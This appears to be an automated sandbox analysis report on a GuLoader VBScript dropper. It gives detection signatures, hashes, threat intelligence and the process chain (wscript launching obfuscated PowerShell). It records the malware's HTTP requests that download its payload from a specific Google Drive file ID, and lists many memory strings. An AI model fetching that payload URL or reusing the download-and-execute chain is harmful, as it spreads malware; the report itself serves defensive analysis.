Windows Analysis Report
2669976595_366408723_KHI_SOF_240702_0957_P.vbs

Overview

General Information

Sample name:	2669976595_366408723_KHI_SOF_240702_0957_P.vbs
Analysis ID:	1466659
MD5:	8a1a3c704c957d6638e61b5d4e4814a2
SHA1:	800fcc7219cab666231b2fc8c9fd7463160be8db
SHA256:	11a67ec7519d527b1351ba13a36ea0ef91b38a1be0c0d27dafdc9884c57a4894
Tags:	vbs
Infos:

Detection

GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Obfuscated command line found

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:56535 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.8:56536 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .Core.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdbk source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: powershell.exe, 0000000D.00000002.2673202295.0000000007BA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000D.00000002.2673202295.0000000007C53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftuP
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/Is?
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396989812.0000023820D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5y
Source: wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391984395.0000023820D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d145861cc9953
Source: wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391984395.0000023820D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabM
Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000003.1400142535.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399158450.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397110745.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1401468590.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398700800.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399639000.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397554662.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398166574.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400548820.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400962270.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398485056.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398375334.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398592474.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397416560.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400990850.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400513979.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399106896.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397821425.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398997557.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400063078.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d145861cc9
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E578C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.g
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.go
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goo
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goog
Source: powershell.exe, 00000009.00000002.2663304130.00000247E574F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googl
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.c
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.co
Source: powershell.exe, 00000009.00000002.2663304130.00000247E3DEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E56F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=d
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=do
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=dow
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=down
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downl
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downlo
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downloa
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&i
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1X
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Xw
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwI
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIR
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRr
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrE
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEg
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgt
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8e
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQ
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQU
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUi
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUie
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZ
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Q
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9k
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kk
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Q
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6a
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6ai
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6ais
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3BA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx
Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisxXRgl
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download
Source: powershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.comh
Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.2663304130.00000247E4C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56536
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56535
Source: unknown	Network traffic detected: HTTP traffic on port 56535 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56536 -> 443

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:56535 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.8:56536 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_3552.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4672	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe

